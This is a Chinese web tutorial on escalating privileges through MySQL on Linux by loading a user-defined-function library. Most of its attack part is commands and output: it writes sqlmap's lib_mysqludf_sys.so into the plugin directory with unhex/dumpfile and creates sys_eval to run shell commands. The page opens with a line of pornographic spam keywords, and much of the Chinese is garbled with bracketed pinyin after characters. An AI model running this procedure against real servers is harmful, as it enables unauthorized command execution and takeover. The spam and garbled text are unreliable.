欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Linux利用UDF庫(kù)實(shí)現(xiàn)Mysql提權(quán)

 更新時(shí)間:2014年07月02日 15:36:09   投稿:hebedich  
根據(jù)MySQL函數(shù)族的可擴(kuò)展機(jī)制,意味著用戶可以自己建立包含有自定義函數(shù)的動(dòng)態(tài)庫(kù)來(lái)創(chuàng)建自定義函數(shù),簡(jiǎn)稱udf

環(huán)境:
os:linux(bt5)
 
database:mysql
 
簡(jiǎn)述:
通過(guò)自定義庫(kù)函數(shù)來(lái)實(shí)現(xiàn)執(zhí)行任意的程序,這里只在linux下測(cè)試通過(guò),具體到windows,所用的dll自然不同。
 
要求:
 在mysql庫(kù)下必須有func表,并且在‑‑skip‑grant‑tables開啟的情況下,UDF會(huì)被禁止;
 
過(guò)程: 得到插件庫(kù)路徑 找對(duì)應(yīng)操作系統(tǒng)的udf庫(kù)文件 利用udf庫(kù)文件加載函數(shù)并執(zhí)行命令

1,得到插件庫(kù)路徑

mysql> show variables like "%plugin%";
+---------------+-----------------------+
| Variable_name | Value         |
+---------------+-----------------------+
| plugin_dir  | /usr/lib/mysql/plugin |
+---------------+-----------------------+
1 row in set (0.00 sec)

2,找對(duì)應(yīng)操作系統(tǒng)的udf庫(kù)文件
因?yàn)樽约簻y(cè)試,看了下自己系統(tǒng)的版本,64位
 

root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

 
對(duì)于udf文件,在sqlmap工具中自帶就有,只要找對(duì)應(yīng)操作系統(tǒng)的版本即可

root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
32 64
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so

3,利用udf庫(kù)文件加載函數(shù)并執(zhí)行命令
首先要得到udf庫(kù)文件的十六進(jìn)制格式,可在本地通過(guò)
 

mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)

 
因?yàn)槲覝y(cè)試時(shí),使用自帶賬戶,賬戶名mysql,并不是root,所以插件目錄不可寫,而實(shí)際中,一般udf提權(quán)都是用root權(quán)限啟動(dòng)的mysql程序,故,不存在目錄權(quán)限不足,不能訪問(wèn)的情況。為了繼續(xù),修改目錄權(quán)限
 
root@bt:~# chmod 777 /usr/lib/mysql/plugin
 
數(shù)據(jù)庫(kù)中寫入udf庫(kù)到mysql庫(kù)目錄:
 

mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)

 
查看下這個(gè)udf庫(kù)所支持的函數(shù)

root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
         w _Jv_RegisterClasses
0000000000201788 A __bss_start
         w __cxa_finalize
         w __gmon_start__
0000000000201788 A _edata
0000000000201798 A _end
0000000000001178 T _fini
0000000000000ba0 T _init
         U fgets
         U fork
         U free
         U getenv
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
         U malloc
         U mmap
         U pclose
         U popen
         U realloc
         U setenv
         U strcpy
         U strncpy
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
         U sysconf
         U system
         U waitpid

最后,加載函數(shù)并執(zhí)行:

mysql> create function sys_eval returns string soname "mysqludf.so";
Query OK, 0 rows affected (0.14 sec)
 
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql       |
+--------------------+
1 row in set (0.04 sec)
 
mysql> select * from mysql.func;
+----------+-----+-------------+----------+
| name   | ret | dl     | type   |
+----------+-----+-------------+----------+
| sys_eval |  0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set

相關(guān)文章

  • MySQL學(xué)習(xí)筆記1:安裝和登錄(多種方法)

    MySQL學(xué)習(xí)筆記1:安裝和登錄(多種方法)

    今天開始學(xué)習(xí)數(shù)據(jù)庫(kù),于數(shù)據(jù)庫(kù)的大理論我就懶得寫了,些考試必備的內(nèi)容我已經(jīng)受夠了我只需要知道一點(diǎn),人們整理數(shù)據(jù)和文件的行為在不斷進(jìn)化,以至現(xiàn)在使用數(shù)據(jù)庫(kù)來(lái)更好的管理
    2013-01-01
  • Mysql如何通過(guò)binlog日志恢復(fù)數(shù)據(jù)詳解

    Mysql如何通過(guò)binlog日志恢復(fù)數(shù)據(jù)詳解

    binlog日志用于記錄所有更新了數(shù)據(jù)或者已經(jīng)潛在更新了數(shù)據(jù)的所有語(yǔ)句,下面這篇文章主要給大家介紹了關(guān)于Mysql如何通過(guò)binlog日志恢復(fù)數(shù)據(jù)的相關(guān)資料,文中通過(guò)圖文介紹的非常詳細(xì),需要的朋友可以參考下
    2022-02-02
  • MySQL的中文UTF8亂碼問(wèn)題

    MySQL的中文UTF8亂碼問(wèn)題

    MySQL從4.x版本開始支持Unicode,3.x只有l(wèi)atin1編碼。剛工作的時(shí)候就開始用MySQL了,用的php存取,網(wǎng)頁(yè)xxx.php是gb2312的編碼,存進(jìn)去的數(shù)據(jù)用php取出來(lái)是中文,用phpMyAdmin執(zhí)行select、update、dump都是中文,沒(méi)有亂碼問(wèn)題。
    2010-05-05
  • MySql在Mac上的安裝與配置詳解

    MySql在Mac上的安裝與配置詳解

    這篇文章主要介紹了MySql在Mac上的安裝配置,需要的朋友可以參考下
    2017-05-05
  • Mysql 5.6使用配置文件my.ini來(lái)設(shè)置長(zhǎng)時(shí)間連接數(shù)據(jù)庫(kù)的問(wèn)題

    Mysql 5.6使用配置文件my.ini來(lái)設(shè)置長(zhǎng)時(shí)間連接數(shù)據(jù)庫(kù)的問(wèn)題

    這篇文章主要介紹了Mysql 5.6使用配置文件my.ini來(lái)設(shè)置長(zhǎng)時(shí)間連接數(shù)據(jù)庫(kù),本文給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2023-07-07
  • mysql 5.7.12 winx64手動(dòng)安裝教程

    mysql 5.7.12 winx64手動(dòng)安裝教程

    這篇文章主要為大家詳細(xì)介紹了mysql 5.7.12 winx64手動(dòng)安裝配置方法圖文教程,感興趣的朋友可以參考一下
    2016-12-12
  • MYSQL增加索引語(yǔ)句小結(jié)

    MYSQL增加索引語(yǔ)句小結(jié)

    這篇文章主要給大家介紹了關(guān)于MYSQL增加索引的相關(guān)資料,索引是一種特殊的文件(InnoDB數(shù)據(jù)表上的索引是表空間的一個(gè)組成部分),它們包含著對(duì)數(shù)據(jù)表里所有記錄的引用指針,需要的朋友可以參考下
    2023-09-09
  • MySQL8.0.32的安裝與配置超詳細(xì)圖文教程

    MySQL8.0.32的安裝與配置超詳細(xì)圖文教程

    這篇文章主要介紹了MySQL8.0.32的安裝與配置超詳細(xì)圖文教程,本文通過(guò)圖文并茂的形式給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2023-03-03
  • MySQL無(wú)法啟動(dòng)1067錯(cuò)誤的又一種解決方法(機(jī)房斷電)

    MySQL無(wú)法啟動(dòng)1067錯(cuò)誤的又一種解決方法(機(jī)房斷電)

    今早在對(duì)一張table 創(chuàng)建primay key過(guò)程中發(fā)生了斷電,當(dāng)電腦再次啟動(dòng)時(shí)候,發(fā)現(xiàn)mysql 服務(wù)無(wú)法啟動(dòng),使用 net start 提示 1067錯(cuò)誤,折騰了2個(gè)小時(shí)無(wú)法解決,后來(lái)只能通過(guò)手工刪除數(shù)據(jù)文件,日志文件,再啟動(dòng)服務(wù),然后導(dǎo)入數(shù)據(jù)來(lái)完成
    2013-01-01
  • MySQL找出未提交事務(wù)的SQL實(shí)例淺析

    MySQL找出未提交事務(wù)的SQL實(shí)例淺析

    這篇文章主要給大家介紹了關(guān)于MySQL找出未提交事務(wù)SQL的相關(guān)資料,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2020-12-12

最新評(píng)論